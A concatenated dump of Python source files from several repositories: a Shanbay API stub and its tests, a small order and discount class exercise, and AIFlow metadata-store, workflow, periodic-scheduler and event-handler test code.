#### File: shanbay-api/shanbay/team.py
```python
import requests
class Team:
def __init__(self):
...
def get_url(self):
...
def get_id(self):
...
def get_forum_id(self):
...
def get_info(self):
...
def get_members(self):
...
def update_limit(self):
...
def dismiss(self):
...
def new_thread(self):
...
``` |
{
"source": "jinxia-shanbay-group/zhao-hua-xi-shi",
"score": 2
} |
#### File: jinxia-shanbay-group/zhao-hua-xi-shi/test_all.py
```python
from shanbay import Shanbay
from spider import Spider
from config import USERNAME
from config import PASSWORD
from task import Agent
def test_shanbay():
sb = Shanbay(USERNAME, PASSWORD)
sb.login()
print(sb.user_id)
print(sb.team_id)
print(sb.forum_id)
print(sb.get_thread("3128002"))
def test_spider():
sp = Spider()
print(sp.get_quote())
print(sp.get_joke())
print(sp.get_pic())
def test_task():
"""只能测试部分函数"""
shanbay = Shanbay(USERNAME, PASSWORD)
spider = Spider()
agent = Agent(shanbay, spider)
agent.thread_id = "3138247"
agent.add_foot()
result = agent.online_check()
agent.local_record(result)
``` |
{
"source": "jinxinfeng/Basic-knowledge",
"score": 4
} |
#### File: JavaScript-Important knowledge points/pytest/1.py
```python
class Good:
def __init__(self,gid,num:int) -> None:
self.gid = gid
self.num=num
pass
class Order(Good):
def __init__(self,id:int,discount:float) -> None:
self.id = id
self.discount =discount
def setDiscount(self, discount: float) -> None:
self.discount = discount
def getDiscount(self) -> float:
return self.discount
class Customer(Order,Good):
def __init__(self,rank:int,num:int,order:Order) -> None:
self.rank = 0  # initial user points
self.num = 0  # initial number of orders for the user
self.order = []  # list of orders
def setRank(self, rank: int)-> None:
self.rank = rank
def getRank(self) -> float:
return self.rank
def setNum (self,num: int) -> None:
self.num = num
def getNum(self) -> int:
return self.num
def setOrder(self,order: Order) -> None:
self.order = order
def getOrder(self) -> Order:
return self.order
def OrderHandler1(self) -> float:
if(self.rank >= 1000):
self.setDiscount(0.95)
def OrderHandler2(self) -> float:
for o in self.getOrder():
if(o.gid == self.gid and self.num >= 20):
self.setDiscount(0.9)
def OrderHandler3(self) -> float:
for o in self.getOrder():
if(o.gid != self.gid and self.num >=10):
self.setDiscount(0.93)
class Cart(Customer,Good):
def __init__(self, rank: int, num: int, order: Order,maxDiscount: float) -> None:
super().__init__(rank, num, order)
self.maxDiscount = 0.0
def OrderHandler4(self) -> float:
# compute points and return the maximum discount
if(self.rank>=1000):
self.OrderHandler1()
self.maxDiscount += self.getNum()*self.getDiscount()
for o in self.order:
if(o.id== self.id and self.num>=20):
self.OrderHandler2()
self.maxDiscount += self.getNum()*self.getDiscount()
elif(o.id==self.id):
self.OrderHandler3()
self.maxDiscount+=self.getNum()*self.getDiscount()
else:
return self.maxDiscount
``` |
{
"source": "jinxing64/flink-ai-extended",
"score": 2
} |
#### File: ai_flow/plugins/platform.py
```python
from typing import Text
import logging
from ai_flow.util.json_utils import Jsonable
from ai_flow.deployer.listener import register_job_status_listener, BaseJobStatusListener
from ai_flow.workflow.job_handler import BaseJobHandler
AbstractJobHandler = BaseJobHandler
AbstractJobStatusListener = BaseJobStatusListener
class AbstractPlatform(Jsonable):
"""
ai flow job must run on one platform, such as local k8s etc.
"""
def __init__(self) -> None:
super().__init__()
@staticmethod
def platform() -> Text:
"""
:return platform name:
"""
raise NotImplementedError("not implement platform")
@staticmethod
def job_status_listener() -> type(AbstractJobStatusListener):
"""
:return AbstractJobStatusListener class:
"""
raise NotImplementedError("not implement AbstractJobStatusListener")
def register_platform(platform: type(AbstractPlatform)):
logging.debug('register platform {}'.format(platform.platform()))
register_job_status_listener(platform.job_status_listener()())
```
#### File: ai_flow/store/abstract_store.py
```python
from abc import abstractmethod, ABCMeta
from ai_flow.rest_endpoint.service.high_availability import Member
from typing import Text, Union, List, Optional
from ai_flow.meta.metric_meta import MetricMeta, MetricSummary
class AbstractStore(object):
__metaclass__ = ABCMeta
def __init__(self):
pass
'''
model api
'''
@abstractmethod
def get_model_relation_by_id(self, model_id):
"""
get a specific model relation in metadata store by model id.
:param model_id: the model id
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object if the model relation
exists, Otherwise, returns None if the model relation does not exist.
"""
pass
@abstractmethod
def get_model_relation_by_name(self, model_name):
"""
get a specific model relation in metadata store by model name.
:param model_name: the model name
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object if the model relation
exists, Otherwise, returns None if the model relation does not exist.
"""
pass
@abstractmethod
def list_model_relation(self, page_size, offset):
"""
List registered model relations in metadata store.
:param page_size: the limitation of the listed model relations.
:param offset: the offset of listed model relations.
:return: List of :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` objects,
return None if no model relations to be listed.
"""
pass
@abstractmethod
def register_model_relation(self, name: Text,
project_id: int):
"""
register a model relation in metadata store
:param name: the name of the model
:param project_id: the project id which the model corresponded to.
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` object.
"""
pass
def delete_model_relation_by_id(self, model_id):
"""
Delete the registered model by model id .
:param model_id: the model id
:return: Status.OK if the model is successfully deleted, Status.ERROR if the model does not exist otherwise.
"""
pass
def delete_model_relation_by_name(self, model_name):
"""
Delete the registered model by model name .
:param model_name: the model name
:return: Status.OK if the model is successfully deleted, Status.ERROR if the model does not exist otherwise.
"""
pass
'''
model version api
'''
@abstractmethod
def get_model_version_relation_by_version(self, version_name, model_id):
"""
get a specific model version relation in metadata store by the model version name.
:param version_name: the model version name
:param model_id: the model id corresponded to the model version
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelVersionRelationMeta` object
if the model version exists, Otherwise, returns None if the model version does not exist.
"""
pass
@abstractmethod
def register_model_version_relation(self, version, model_id,
workflow_execution_id):
"""
register a model version relation in metadata store.
:param version: the specific model version
:param model_id: the model id corresponded to the model version
:param workflow_execution_id: the workflow execution id corresponded to the model version
:return: A single :py:class:`ai_flow.meta.model_relation_meta.ModelVersionRelationMeta` object.
"""
pass
@abstractmethod
def list_model_version_relation(self, model_id, page_size, offset):
"""
List registered model version relations in metadata store.
:param model_id: the model id corresponded to the model version
:param page_size: the limitation of the listed model version relations.
:param offset: the offset of listed model version relations.
:return: List of :py:class:`ai_flow.meta.model_relation_meta.ModelRelationMeta` objects,
return None if no model version relations to be listed.
"""
pass
@abstractmethod
def delete_model_version_relation_by_version(self, version, model_id):
"""
Delete the registered model version by model version name .
:param version: the model version name
:param model_id: the model id corresponded to the model version
:return: Status.OK if the model version is successfully deleted,
Status.ERROR if the model version does not exist otherwise.
"""
pass
'''
example api
'''
@abstractmethod
def get_example_by_id(self, example_id):
"""
get a specific example in metadata store by example id.
:param example_id: the example id
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object if the example exists,
Otherwise, returns None if the example does not exist.
"""
pass
@abstractmethod
def get_example_by_name(self, example_name):
"""
get a specific example in metadata store by example name.
:param example_name: the example name
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object if the example exists,
Otherwise, returns None if the example does not exist.
"""
pass
@abstractmethod
def list_example(self, page_size, offset):
"""
List registered examples in metadata store.
:param page_size: the limitation of the listed examples.
:param offset: the offset of listed examples.
:return: List of :py:class:`ai_flow.meta.example_meta.ExampleMeta` objects,
return None if no examples to be listed.
"""
pass
@abstractmethod
def register_example(self, name, support_type, data_format,
description, batch_uri, stream_uri,
create_time, update_time, properties,
name_list, type_list):
"""
register an example in metadata store.
:param name: the name of the example
:param support_type: the example's support_type
:param data_format: the data_format of the example
:param description: the description of the example
:param batch_uri: the batch uri of the example
:param stream_uri: the stream uri of the example
:param create_time: the time when the example is created
:param update_time: the time when the example is updated
:param properties: the properties of the example
:param name_list: the name list of example's schema
:param type_list: the type list corresponded to the name list of example's schema
:param catalog_type: the catalog type of the example if example is stored in the external catalog
:param connection_config: the connection config of the example to the external catalog
if example is stored in the external catalog
:return: A single :py:class:`ai_flow.meta.example_meta.ExampleMeta` object.
"""
pass
def delete_example_by_id(self, example_id):
"""
Delete the registered example by example id .
:param example_id: the example id
:return: Status.OK if the example is successfully deleted, Status.ERROR if the example does not exist otherwise.
"""
pass
def delete_example_by_name(self, example_name):
"""
Delete the registered example by example name .
:param example_name: the example name
:return: Status.OK if the example is successfully deleted, Status.ERROR if the example does not exist otherwise.
"""
pass
'''
project api
'''
@abstractmethod
def get_project_by_id(self, project_id):
"""
get an specific project in metadata store by project id
:param project_id: the project id
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object if the project exists,
Otherwise, returns None if the project does not exist.
"""
pass
@abstractmethod
def get_project_by_name(self, project_name):
"""
get a specific project in metadata store by project name
:param project_name: the project name
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object if the project exists,
Otherwise, returns None if the project does not exist.
"""
pass
@abstractmethod
def register_project(self, name, uri,
properties, user,
password, project_type):
"""
register a project in metadata store.
:param name: the name of the project
:param uri: the uri of the project
:param properties: the properties of the project
:param user: the user of the project
:param password: the password of the project
:param project_type: the project type of the project
:return: A single :py:class:`ai_flow.meta.project.ProjectMeta` object.
"""
pass
@abstractmethod
def list_project(self, page_size, offset):
"""
List registered projects in metadata store.
:param page_size: the limitation of the listed projects.
:param offset: the offset of listed projects.
:return: List of :py:class:`ai_flow.meta.project_meta.ProjectMeta` objects,
return None if no projects to be listed.
"""
pass
@abstractmethod
def delete_project_by_id(self, project_id):
"""
Delete the registered project by project id .
:param project_id: the project id
:return: Status.OK if the project is successfully deleted, Status.ERROR if the project does not exist otherwise.
"""
pass
def delete_project_by_name(self, project_name):
"""
Delete the registered project by project name .
:param project_name: the project name
:return: Status.OK if the project is successfully deleted, Status.ERROR if the project does not exist otherwise.
"""
pass
'''
job api
'''
@abstractmethod
def get_job_by_id(self, job_id):
"""
get an specific job in metadata store by job id.
:param job_id: the job id
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object
if the job exists, Otherwise, returns None if the job does not exist.
"""
pass
@abstractmethod
def get_job_by_name(self, job_name):
"""
get an specific job in metadata store by job name.
:param job_name: the job name
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object
if the job exists, Otherwise, returns None if the job does not exist.
"""
pass
@abstractmethod
def register_job(self, name: Text, job_state, workflow_execution_id,
properties, job_id, start_time, end_time,
log_uri, signature):
"""
register a job in metadata store.
:param name: the name of the job
:param job_state: the state of the job
:param workflow_execution_id: the workflow execution id corresponded to the job
:param properties: the properties of the job
:param job_id: the job_id of the job
:param start_time: the time when the job started
:param end_time: the time when the job ended
:param log_uri: the log uri of the job
:param signature: the signature of the job
:return: A single :py:class:`ai_flow.meta.job_meta.JobMeta` object.
"""
pass
@abstractmethod
def list_job(self, page_size, offset):
"""
List registered jobs in metadata store.
:param page_size: the limitation of the listed jobs.
:param offset: the offset of listed jobs.
:return: List of :py:class:`ai_flow.meta.job_meta.JobMeta` objects,
return None if no jobs to be listed.
"""
pass
@abstractmethod
def update_job_state(self, state, job_id):
"""
update the job state in metadata store.
:param state: the state of the job.
:param job_id: the job id
:return: the job uuid if the job is successfully updated, raise an exception if fail to update otherwise.
"""
pass
def update_job_end_time(self, end_time, job_name):
"""
update the job end time in metadata store.
:param end_time: the time when the job ended.
:param job_name: the job name
:return: the job uuid if the job is successfully updated, raise an exception if fail to update otherwise.
"""
pass
'''
workflow execution api
'''
@abstractmethod
def get_workflow_execution_by_id(self, execution_id):
"""
get a specific workflow execution in metadata store by workflow execution id.
:param execution_id: the workflow execution id
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object
if the workflow execution exists, Otherwise, returns None if the workflow execution does not exist.
"""
pass
@abstractmethod
def get_workflow_execution_by_name(self, execution_name):
"""
get an specific workflow execution in metadata store by workflow execution name.
:param execution_name: the workflow execution name
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object
if the workflow execution exists, Otherwise, returns None if the workflow execution does not exist.
"""
pass
@abstractmethod
def register_workflow_execution(self, name: Text,
execution_state, project_id,
properties, start_time,
end_time, log_uri,
workflow_json, signature):
"""
register a workflow execution in metadata store.
:param name: the name of the workflow execution
:param execution_state: the execution state of the workflow execution
:param project_id: the project id corresponded to the workflow execution
:param properties: the properties of the workflow execution
:param start_time: the time when the workflow execution started
:param end_time: the time when the workflow execution ended
:param log_uri: the log uri of the workflow execution
:param workflow_json: the workflow json of the workflow execution
:param signature: the signature of the workflow execution
:return: A single :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object.
"""
pass
@abstractmethod
def list_workflow_execution(self, page_size, offset):
"""
List registered workflow executions in metadata store.
:param page_size: the limitation of the listed workflow executions.
:param offset: the offset of listed workflow executions.
:return: List of :py:class:`ai_flow.meta.workflow_execution_meta.WorkflowExecutionMeta` object,
return None if no workflow executions to be listed.
"""
pass
@abstractmethod
def update_workflow_execution_end_time(self, end_time, execution_name):
"""
update the workflow execution end time in metadata store.
:param end_time: the time when the workflow execution ended.
:param execution_name: the execution name
:return: the workflow execution uuid if the workflow execution is successfully updated, raise an exception
if fail to update otherwise.
"""
pass
@abstractmethod
def update_workflow_execution_state(self, state, execution_name):
"""
update the workflow execution end time in metadata store.
:param state: the state of the workflow execution.
:param execution_name: the execution name
:return: the workflow execution uuid if the workflow execution is successfully updated, raise an exception
if fail to update otherwise.
"""
@abstractmethod
def delete_workflow_execution_by_id(self, execution_id):
"""
Delete the registered workflow execution by workflow execution id .
:param execution_id: the workflow execution id
:return: Status.OK if the workflow execution is successfully deleted,
Status.ERROR if the workflow execution does not exist otherwise.
"""
pass
@abstractmethod
def delete_workflow_execution_by_name(self, execution_name):
"""
Delete the registered workflow execution by workflow execution name .
:param execution_name: the workflow execution name
:return: Status.OK if the workflow execution is successfully deleted,
Status.ERROR if the workflow execution does not exist otherwise.
"""
pass
'''
artifact api
'''
def get_artifact_by_id(self, artifact_id):
"""
get a specific artifact in metadata store by artifact id.
:param artifact_id: the artifact id
:return: A single :py:class:`ai_flow.meta.artifact_meta.ArtifactMeta` object
if the artifact exists, Otherwise, returns None if the artifact does not exist.
"""
def get_artifact_by_name(self, artifact_name):
"""
get a specific artifact in metadata store by artifact name.
:param artifact_name: the artifact name
:return: A single :py:class:`ai_flow.meta.artifact_meta.ArtifactMeta` object
if the artifact exists, Otherwise, returns None if the artifact does not exist.
"""
def register_artifact(self, name: Text, data_format, description,
batch_uri, stream_uri, create_time, update_time, properties):
"""
register an artifact in metadata store.
:param name: the name of the artifact
:param data_format: the data_format of the artifact
:param description: the description of the artifact
:param batch_uri: the batch uri of the artifact
:param stream_uri: the stream uri of the artifact
:param create_time: the time when the artifact is created
:param update_time: the time when the artifact is updated
:param properties: the properties of the artifact
:return: A single :py:class:`ai_flow.meta.artifact_meta.py.ArtifactMeta` object.
"""
def list_artifact(self, page_size, offset):
"""
List registered artifacts in metadata store.
:param page_size: the limitation of the listed artifacts.
:param offset: the offset of listed artifacts.
:return: List of :py:class:`ai_flow.meta.artifact_meta.py.ArtifactMeta` objects,
return None if no artifacts to be listed.
"""
def delete_artifact_by_id(self, artifact_id):
"""
Delete the registered artifact by artifact id .
:param artifact_id: the artifact id
:return: Status.OK if the artifact is successfully deleted,
Status.ERROR if the artifact does not exist otherwise.
"""
def delete_artifact_by_name(self, artifact_name):
"""
Delete the registered artifact by artifact name .
:param artifact_name: the artifact name
:return: Status.OK if the artifact is successfully deleted,
Status.ERROR if the artifact does not exist otherwise.
"""
@abstractmethod
def create_registered_model(self, model_name, model_type, model_desc=None):
"""
Create a new registered model in model repository.
:param model_name: Name of registered model. This is expected to be unique in the backend store.
:param model_type: Type of registered model.
:param model_desc: (Optional) Description of registered model.
:return: A single object of :py:class:`ai_flow.model_center.entity.RegisteredModel` created in model
repository.
"""
pass
@abstractmethod
def update_registered_model(self, registered_model, model_name=None, model_type=None, model_desc=None):
"""
Update metadata for RegisteredModel entity. Either ``model_name`` or ``model_type`` or ``model_desc``
should be non-None. Backend raises exception if a registered model with given name does not exist.
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:param model_name: (Optional) New proposed name for the registered model.
:param model_type: (Optional) Type of registered model.
:param model_desc: (Optional) Description of registered model.
:return: A single updated :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
"""
pass
@abstractmethod
def delete_registered_model(self, registered_model):
"""
Delete registered model.
Backend raises exception if a registered model with given name does not exist.
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:return: None
"""
pass
@abstractmethod
def list_registered_models(self):
"""
List of all registered models in model repository.
:return: List of :py:class:`ai_flow.model_center.entity.RegisteredModel` objects.
"""
pass
@abstractmethod
def get_registered_model_detail(self, registered_model):
"""
:param registered_model: :py:class:`ai_flow.model_center.entity.RegisteredModel` object.
:return: A single :py:class:`ai_flow.model_center.entity.RegisteredModelDetail` object.
"""
pass
@abstractmethod
def create_model_version(self, model_name, model_version, model_path, model_metric, model_flavor=None,
version_desc=None):
"""
Create a new model version from given model source and model metric.
:param model_name: Name for containing registered model.
:param model_version: User-defined version of registered model.
:param model_path: Source path where the AIFlow model is stored.
:param model_metric: Metric address from AIFlow metric server of registered model.
:param model_flavor: (Optional) Flavor feature of AIFlow registered model option.
:param version_desc: (Optional) Description of registered model version.
:return: A single object of :py:class:`ai_flow.model_center.entity.ModelVersion`
created in model repository.
"""
pass
@abstractmethod
def update_model_version(self, model_version, model_path=None, model_metric=None, model_flavor=None,
version_desc=None, version_stage=None):
"""
Update metadata associated with a model version in model repository.
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:param model_path: (Optional) New Source path where AIFlow model is stored.
:param model_metric: (Optional) New Metric address AIFlow metric server of registered model provided.
:param model_flavor: (Optional) Flavor feature of AIFlow registered model option.
:param version_desc: (Optional) New Description of registered model version.
:param version_stage: (Optional) New desired stage for this model version.
:return: A single updated :py:class:`ai_flow.model_center.entity.ModelVersion` object.
"""
pass
@abstractmethod
def delete_model_version(self, model_version):
"""
Delete model version in model repository.
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:return: None
"""
pass
@abstractmethod
def get_model_version_detail(self, model_version):
"""
:param model_version: :py:class:`ai_flow.model_center.entity.ModelVersion` object.
:return: A single :py:class:`ai_flow.model_center.entity.ModelVersionDetail` object.
"""
pass
def register_metric_meta(self,
name,
dataset_id,
model_name,
model_version,
job_id,
start_time,
end_time,
metric_type,
uri,
tags,
metric_description,
properties) -> MetricMeta:
"""
register metric meta to store
:param name: the metric name
:param dataset_id: the dataset id of the metric or model metric associate with dataset id
:param model_name: if then model metric, associate with model name
:param model_version: if then model metric, associate with model version
:param job_id: the job_id which create the metric
:param start_time:
:param end_time:
:param metric_type: MetricType DATASET or MODEL
:param uri: the metric uri
:param tags: such as flink,tensorflow
:param metric_description:
:param properties:
:return:
"""
pass
def delete_metric_meta(self, uuid: int):
pass
def register_metric_summary(self,
metric_id,
metric_key,
metric_value)->MetricSummary:
"""
register metric summary
:param metric_id: associate with metric meta uuid
:param metric_key:
:param metric_value:
:return:
"""
pass
def delete_metric_summary(self, uuid: int):
pass
def update_metric_meta(self,
uuid,
dataset_id=None,
model_version_id=None,
job_id=None,
start_time=None,
end_time=None,
metric_type=None,
uri=None,
tags=None,
metric_description=None,
properties=None) -> MetricMeta:
"""
register metric meta to store
:param uuid: metric meta unique id
:param dataset_id: the dataset id of the metric or model metric associate with dataset id
:param model_version_id: if then model metric, associate with model version id
:param job_id: the job_id which create the metric
:param start_time:
:param end_time:
:param metric_type: MetricType DATASET or MODEL
:param uri: the metric uri
:param tags: such as flink,tensorflow
:param metric_description:
:param properties:
:return:
"""
pass
def update_metric_summary(self,
uuid,
metric_id=None,
metric_key=None,
metric_value=None) -> MetricSummary:
"""
register metric summary
:param uuid: metric summary unique id
:param metric_id: associate with metric meta uuid
:param metric_key:
:param metric_value:
:return:
"""
pass
def get_dataset_metric_meta(self, dataset_id) -> Union[None, MetricMeta, List[MetricMeta]]:
"""
get dataset metric
:param dataset_id:
:return:
"""
pass
def get_model_metric_meta(self, model_name, model_version) -> Union[None, MetricMeta, List[MetricMeta]]:
"""
get model metric
:param model_name:
:param model_version:
:return:
"""
pass
def get_metric_summary(self, metric_id) -> Optional[List[MetricSummary]]:
"""
get metric summary
:param metric_id:
:return:
"""
pass
"""For high availability:"""
@abstractmethod
def list_living_members(self, ttl_ms) -> List['Member']:
pass
@abstractmethod
def update_member(self, server_uri, server_uuid):
pass
@abstractmethod
def clear_dead_members(self, ttl_ms):
pass
```
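To make the contract above concrete, here is a hedged, illustrative in-memory subclass covering only the project API; it is not part of AIFlow and returns plain dicts where the real stores return ProjectMeta objects.
```python
# Illustrative only: a toy backend for experimenting with the AbstractStore interface.
from ai_flow.store.abstract_store import AbstractStore


class InMemoryStore(AbstractStore):
    def __init__(self):
        super().__init__()
        self._projects = {}
        self._next_id = 1

    def register_project(self, name, uri, properties, user, password, project_type):
        project = dict(id=self._next_id, name=name, uri=uri, properties=properties,
                       user=user, password=password, project_type=project_type)
        self._projects[project['id']] = project
        self._next_id += 1
        return project

    def get_project_by_id(self, project_id):
        return self._projects.get(project_id)

    def get_project_by_name(self, project_name):
        return next((p for p in self._projects.values() if p['name'] == project_name), None)

    def delete_project_by_id(self, project_id):
        return self._projects.pop(project_id, None) is not None

    def list_project(self, page_size, offset):
        listed = list(self._projects.values())[offset:offset + page_size]
        return listed or None
```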
#### File: ai_flow/workflow/workflow.py
```python
from typing import List, Dict, Text
from ai_flow.meta.job_meta import State
from ai_flow.graph.node import BaseNode
from ai_flow.graph.edge import JobControlEdge
from ai_flow.workflow.job import BaseJob
from ai_flow.graph.graph import _get_id_generator
from ai_flow.project.project_description import ProjectDesc
class Workflow(BaseNode):
def __init__(self) -> None:
super().__init__()
self.workflow_id: int = None
self.workflow_name: Text = None
self.execution_name: Text = None
self.jobs: Dict[Text, BaseJob] = {}
self.edges: Dict[Text, List[JobControlEdge]] = {}
self.workflow_phase = None
self.start_time = None
self.end_time = None
self.project_desc: ProjectDesc = None
def add_job(self, job: BaseJob):
if job.instance_id is None:
instance_id = _get_id_generator(self).generate_id(job)
job.set_instance_id(instance_id)
self.jobs[job.instance_id] = job
def add_edges(self, job_instance_id: Text, dependencies: List[JobControlEdge]):
self.edges[job_instance_id] = dependencies
def add_edge(self, job_instance_id: Text, edge: JobControlEdge):
if job_instance_id not in self.edges:
self.edges[job_instance_id] = []
self.edges[job_instance_id].append(edge)
class WorkflowInfo(object):
def __init__(self, namespace: Text = None, workflow_name: Text = None, properties: Dict = None):
"""
:param workflow_name: The identify of the ai_flow workflow.
:param properties: The properties of the workflow.
"""
self._namespace = namespace
self._workflow_name = workflow_name
if properties is None:
properties = {}
self._properties = properties
@property
def namespace(self):
return self._namespace
@namespace.setter
def namespace(self, value):
self._namespace = value
@property
def workflow_name(self):
return self._workflow_name
@workflow_name.setter
def workflow_name(self, value):
self._workflow_name = value
@property
def properties(self):
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class WorkflowExecutionInfo(object):
def __init__(self,
execution_id: Text,
workflow_info: WorkflowInfo = None,
state: State = None,
properties: Dict = None):
if properties is None:
properties = {}
self._execution_id = execution_id
self._workflow_info = workflow_info
self._state = state
self._properties = properties
@property
def execution_id(self):
return self._execution_id
@execution_id.setter
def execution_id(self, value):
self._execution_id = value
@property
def workflow_info(self):
return self._workflow_info
@workflow_info.setter
def workflow_info(self, value):
self._workflow_info = value
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
@property
def properties(self):
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class JobInfo(object):
def __init__(self,
job_name: Text,
state: State,
workflow_execution: WorkflowExecutionInfo
):
self._job_name = job_name
self._state = state
self._workflow_execution = workflow_execution
@property
def job_name(self):
return self._job_name
@job_name.setter
def job_name(self, value):
self._job_name = value
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
@property
def workflow_execution(self):
return self._workflow_execution
@workflow_execution.setter
def workflow_execution(self, value):
self._workflow_execution = value
```
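A small sketch using only the plain info classes defined above (it assumes `State` in ai_flow.meta.job_meta has a RUNNING member):
```python
from ai_flow.meta.job_meta import State
from ai_flow.workflow.workflow import WorkflowInfo, WorkflowExecutionInfo, JobInfo

wf_info = WorkflowInfo(namespace='default', workflow_name='daily_training')
execution = WorkflowExecutionInfo(execution_id='exec-001',
                                  workflow_info=wf_info,
                                  state=State.RUNNING)          # assumed enum member
job = JobInfo(job_name='train_job', state=State.RUNNING, workflow_execution=execution)

print(job.workflow_execution.workflow_info.workflow_name)       # -> daily_training
```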
#### File: contrib/jobs/periodic_manager.py
```python
from airflow.utils.mailbox import Mailbox
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.interval import IntervalTrigger
from airflow.events.scheduler_events import PeriodicEvent
from airflow.utils.log.logging_mixin import LoggingMixin
def trigger_periodic_task(mailbox, run_id, task_id):
mailbox.send_message(PeriodicEvent(run_id, task_id).to_event())
class PeriodicManager(LoggingMixin):
def __init__(self, mailbox: Mailbox):
super().__init__()
self.mailbox = mailbox
self.sc = BackgroundScheduler()
def start(self):
self.sc.start()
def shutdown(self):
self.sc.shutdown()
def _generate_job_id(self, run_id, task_id):
return '{}:{}'.format(run_id, task_id)
def add_task(self, run_id, task_id, periodic_config):
if 'cron' in periodic_config:
self.sc.add_job(id=self._generate_job_id(run_id, task_id),
func=trigger_periodic_task, args=(self.mailbox, run_id, task_id),
trigger=CronTrigger.from_crontab(periodic_config['cron']))
elif 'interval' in periodic_config:
            interval_config: dict = periodic_config['interval']
            # default any missing time unit to 0
            seconds = interval_config.get('seconds', 0)
            minutes = interval_config.get('minutes', 0)
            hours = interval_config.get('hours', 0)
            days = interval_config.get('days', 0)
            weeks = interval_config.get('weeks', 0)
            if seconds < 10 and 0 >= minutes and 0 >= hours and 0 >= days and 0 >= weeks:
                self.log.error('Interval must be greater than or equal to 10 seconds')
return
self.sc.add_job(id=self._generate_job_id(run_id, task_id),
func=trigger_periodic_task, args=(self.mailbox, run_id, task_id),
trigger=IntervalTrigger(seconds=seconds,
minutes=minutes,
hours=hours,
days=days,
weeks=weeks))
else:
            self.log.error('Periodic config only supports the "cron" or "interval" type. Current periodic config: {}'.format(periodic_config))
def remove_task(self, run_id, task_id):
self.sc.remove_job(job_id=self._generate_job_id(run_id, task_id))
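# Illustrative usage sketch (hypothetical wiring; the real scheduler owns these calls):
#     manager = PeriodicManager(mailbox)   # 'mailbox' is an existing Mailbox instance
#     manager.start()
#     manager.add_task('run_1', 'task_a', {'cron': '*/5 * * * *'})
#     manager.add_task('run_1', 'task_b', {'interval': {'minutes': 1}})
#     manager.remove_task('run_1', 'task_b')
#     manager.shutdown()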
```
#### File: contrib/jobs/test_event_handlers.py
```python
import unittest
import json
import time
from airflow.executors.scheduling_action import SchedulingAction
from notification_service.base_notification import BaseEvent
from airflow.contrib.jobs.event_handlers import AIFlowHandler, AiFlowTs
class TestAIFlowEventHandlers(unittest.TestCase):
def test_one_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_two_config(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
met_config_2 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_2",
"event_type": "UNDEFINED",
"event_value": "value_2",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1, met_config_2]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
event: BaseEvent = BaseEvent(key='key_2',
value='value_2',
namespace='default',
sender='1-job-name',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_two_config_2(self):
met_config_1 = {"action": "START",
"condition": "SUFFICIENT",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
met_config_2 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_2",
"event_type": "UNDEFINED",
"event_value": "value_2",
"life": "ONCE",
"namespace": "default",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1, met_config_2]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
def test_namespace_any(self):
met_config_1 = {"action": "START",
"condition": "NECESSARY",
"event_key": "key_1",
"event_type": "UNDEFINED",
"event_value": "value_1",
"life": "ONCE",
"namespace": "*",
"sender": "1-job-name",
"value_condition": "EQUAL"}
configs = [met_config_1]
config_str = json.dumps(configs)
handler = AIFlowHandler(config=config_str)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='aa',
sender='1-job-name',
create_time=int(time.time()*1000))
